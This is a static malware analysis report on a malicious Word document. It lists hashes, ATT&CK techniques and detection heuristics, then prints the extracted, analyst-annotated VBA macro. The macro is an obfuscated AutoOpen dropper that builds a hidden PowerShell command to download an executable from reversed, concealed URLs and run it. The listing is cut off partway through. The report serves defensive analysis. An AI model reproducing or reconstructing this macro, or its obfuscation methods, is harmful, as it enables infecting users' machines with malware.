Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bf4347f058fbff52…

MALICIOUS

Office (OLE)

66.0 KB Created: 2018-09-12 08:05:00 Authoring application: Microsoft Office Word First seen: 2018-10-07
MD5: c54bd6d55e06999f9b961b55be5c2413 SHA-1: 4f2a47d0728015d7862568b6936486666c78a2e0 SHA-256: bf4347f058fbff52cb765801ca395209ebdbee4777bc66e0007b6d4e1ffd3ad1
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 — Command and Scripting Interpreter: Visual Basic; T1204.002 — User Execution: Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. The macro uses the Shell() function to execute a command-line instruction. The script constructs a command that appears to set an environment variable, likely as part of a multi-stage download and execution process. The Shell() call together with the obfuscated command construction strongly indicates downloader or dropper functionality.

Heuristics 6

  • ClamAV: Doc.Malware.Generic-6691326-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6691326-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4906 bytes
SHA-256: d61e885ff4bc54ef0ddf03809ef698c0d86ece1ab80baf1eddf1371c06985986
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "LiaUosZFwXaV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module header of the first extracted module. VB_Base references ThisDocument, so this is
' presumably the document's own class module (the one Word consults for auto-exec procedures) — confirm.
' The module name is a random-looking string, consistent with the generated identifiers used below.
Sub AutoOpen()
' Auto-execution entry point: Word runs a procedure named AutoOpen when the document is opened
' (the OLE_VBA_AUTOOPEN finding above). This is the only procedure in the sample that has a side effect.
On _
Error _
Resume _
Next
' The four continuation lines above form a single "On Error Resume Next" statement, split so that
' the keyword sequence does not appear on one line; it suppresses every runtime error in this procedure.
   Set muMFWr = XaJIN
   Set rBlmW = hudFCH
' "Set" assignments between undefined names: with errors suppressed these are effectively no-ops
' and read as filler / signature noise rather than logic.
Shell RYLvMuUX + GMsntZKknk + zojcWRp + dOqQECm + FjBSVMqkZpWDq + TdcOapTqRGFzjz, Format(0)
' The command string is assembled at call time by concatenating six helper functions (only the first
' three are visible in this preview). Format(0) returns the string "0", presumably coerced to 0
' (vbHide) for Shell's window-style argument so no console window is shown — confirm.
   Set CziEbL = mIAQLz
End Sub



Attribute VB_Name = "qujmYfqwCmpk"
' Header of the second extracted module, which holds the string-builder functions that AutoOpen
' concatenates. No VB_Base attribute is present here, so this is presumably a standard module — confirm.
Function RYLvMuUX()
' Builds the first fragment of the command string that AutoOpen passes to Shell().
' Returns: a String assembled from seven local pieces in source order. Because errors are
' suppressed, any piece whose expression fails would simply contribute an empty value.

On _
Error _
Resume _
Next
' "On Error Resume Next" split across continuation lines; every runtime error below is ignored.
Set OMEvnl = TWmzwO
' Chr(0 + 15 + 8 + 7 + 69) evaluates to Chr(99); the character code is hidden behind trivial
' arithmetic so the literal never appears in the stored source. The same construction on this line
' yields Chr(67) and Chr(34). Format() around Chr() only converts the result to a String.
uzMvii = Format(Chr(0 + 15 + 8 + 7 + 69)) + "md /V" + "^" + ":^O/" + Format(Chr(0 + 10 + 5 + 5 + 47)) + Format(Chr(0 + 4 + 2 + 2 + 26)) + "^" + "se^t " + "8^L=^ ^" + " ^ ^"
' The "^" characters interleaved through the fragments are consistent with cmd.exe caret escapes,
' which the interpreter strips at run time; in the stored text they break up keywords (e.g. "se^t")
' that a plain substring scanner would otherwise match. Detection should normalise carets first.
Set ZisRJ = aRVjm
   Set zfszJc = LKUhj
   Set GUqUsS = cQHzpz
' Each run of "Set x = y" on undefined names is filler whose errors are suppressed; it carries no data.
siPsLcVJkhr = "  ^ ^" + " " + "^   ^" + "  ^ " + "   " + " }^" + "}^" + "{h" + Format(Chr(0 + 15 + 8 + 7 + 69)) + "^t^" + "a" + Format(Chr(0 + 15 + 8 + 7 + 69)) + "};ka" + "erb^;V" + "f^X"
Set GHDrwE = zIohUk
   Set JwKhV = Iiszi
   Set TDQpqj = FuMwAW
   Set AUdjAl = pOUJjC
iizbcjBOrF = "$^ ^" + "met^I" + "-eko" + "vn^" + "I^;)"
Set zdLrSp = ibnGki
   Set jAajF = pwfSj
   Set VsTQE = tLLVV
OcVimMaZqv = "V^fX$^ " + "^,BUI^" + "$(el" + "^i^F^d^" + "a^o" + "^l" + "nwo" + "^D^.^I" + "v^d^$"
Set EMjajN = sdUvjK
   Set ItkXVF = AAART
   Set SsADr = lYjZEI
   Set fFkiI = koAqk
zOdjiHN = "{^yr" + "t{)MW" + "^Z^" + "$^ n^i^" + " ^B^"
Set JTCtjL = zVvLc
jCJbud = "U" + "I$(^h" + Format(Chr(0 + 15 + 8 + 7 + 69)) + "aer" + "o^f^;" + "^'^ex" + "^" + "e^.'"
Set uwUzfG = MUowM
   Set StWOl = chQLb
WkGjODE = "^+^d" + "Dj^$+" + "^'^\^" + "'" + "+" + Format(Chr(0 + 15 + 8 + 7 + 69)) + "il^b^u" + "p^:" + "vn^e" + "^$=Vf^" + "X^$;^'" + "22" + "1^'"
' Several of the fragments above read as reversed pieces of recognisable tokens, which would be
' consistent with the assembled text being reversed by the command it feeds. That is an inference
' from the text order only and is not verified in this preview.
RYLvMuUX = uzMvii + siPsLcVJkhr + iizbcjBOrF + OcVimMaZqv + zOdjiHN + jCJbud + WkGjODE
' Concatenate the pieces in source order; assigning to the function name sets the return value.
   Set cKdGO = GSziz
   Set GhFkz = ZCBoO
End Function
Function GMsntZKknk()
' Builds the second fragment of the Shell() command string; same construction pattern as RYLvMuUX
' (suppressed errors, filler "Set" statements, caret-split fragments, Chr() arithmetic for 'c' = Chr(99)).
' Returns: a String assembled from six local pieces in source order.

On _
Error _
Resume _
Next
' "On Error Resume Next" split across continuation lines; every runtime error below is ignored.
Set MaVOq = ztlqIZ
   Set MhIWZ = qkKLp
   Set TzurO = HVzLbb
jkPpbdkj = "^ ^=" + " d^Dj" + "^$;" + ")'" + "@'(t^i^" + "l" + "^p^S" + "^.^'K"
Set Djpbu = cRfYjN
   Set XuvCC = DHwzQ
   Set NVhvqs = JowwJU
' Fragments such as "ptt^h^@" / "l//^:pt" and "m^o" + Chr(99) look like reversed URL and hostname
' pieces, pointing to a list of download locations separated by "@". This is inferred from the text
' order; the live URLs should be reconstructed in a sandbox, not from this listing.
mihshOcdQG = "^ml^e^0" + "J^E/mo" + Format(Chr(0 + 15 + 8 + 7 + 69)) + ".s^e" + Format(Chr(0 + 15 + 8 + 7 + 69)) + "n^e^te" + "pm^o" + Format(Chr(0 + 15 + 8 + 7 + 69)) + "^" + "e^dn^a" + "lib" + "u^dgo^" + "lb^e^" + "l//^:pt" + "^th^@2^" + "O^D^ab/" + "^ta"
Set BWKiU = QhZpMs
   Set XHuMlt = jfzjU
   Set OZTIj = JMiji
   Set zwthho = NKpZs
mcwrHtfn = "^" + ".^w^" + "o" + "nsd^i^" + "k.ww^w/" + "/" + "^:^" + "ptt^h@^" + "W^" + "eUH^9/a" + "u^.m^o" + Format(Chr(0 + 15 + 8 + 7 + 69)) + "^." + "v^e^i^k"
Set SqKwzb = cpuvz
   Set jiszOb = Mcisf
   Set kuQvL = qYCNW
   Set XDVop = qCuMG
WQZbb = "g^o" + "^l^ot^e" + "m^so^" + "k//" + ":^pt" + "^t^h" + "^@" + "RvE" + "EQ^z" + "/m^o" + Format(Chr(0 + 15 + 8 + 7 + 69)) + ".n^a^h" + "^a^pe^s" + "^t"
Set phJEb = zNDNuM
   Set IZqCWJ = BNsPf
tBHudrF = "anas" + "ars^" + "ak//:" + "ptt^h^" + "@71/^m" + "o" + Format(Chr(0 + 15 + 8 + 7 + 69)) + "^.gn"
Set Rovjl = zsXcMi
   Set zqYcwN = YBPauc
   Set FUWkaz = ltLzj
   Set lTOQiT = BciLi
CUjwqCwitZC = "ip" + "^" + "uor^" + "g" + "-^" + "l^i" + "^" + "a^m//^:"
GMsntZKknk = jkPpbdkj + mihshOcdQG + mcwrHtfn + WQZbb + tBHudrF + CUjwqCwitZC
' Concatenate the pieces in source order; assigning to the function name sets the return value.
   Set JqFtBj = UWBSt
   Set hKWkc = LiWLB
   Set YsMtUE = Nvoqs
   Set DwYQDm = ijars
End Function
Function zojcWRp()

On _
Error _
Resume _
Next
Set UtrvDO = kzrbq
   Set JlCbRj = EjzrM
   Set aWzKLw = ZDHQX
isYihVzBX = "^" + "ptt^h^" + "'=^MWZ" + "$;^tnei" + "^"
Set iUrYz = OzqrbV
   Set BWabC = fibht
   Set YsQhcE = Nqujok
   Set LtPZjp = vITYp
   Set wHOEO = GIZpPm
aXYaXdwNBOa = "l" + Format(Chr(0 + 10 + 5 + 5 + 47)) + "b" + "e^W.te" + "N^ ^" + "t" + Format(Chr(0 + 15 + 8 + 7 + 69)) + "e" + "^j" + "^b^" + "o-w" + "en=" + "^Iv^d$" + " l^leh^" + "srewo" + "^p&&^f^" + "or "
Set bhKozW = iDjid
   Set DXwOI = ulswn
   Set AsKfLL = sbmMt
AVnjhq = "/^L %^p" + " ^in " + "(3^8
... (truncated)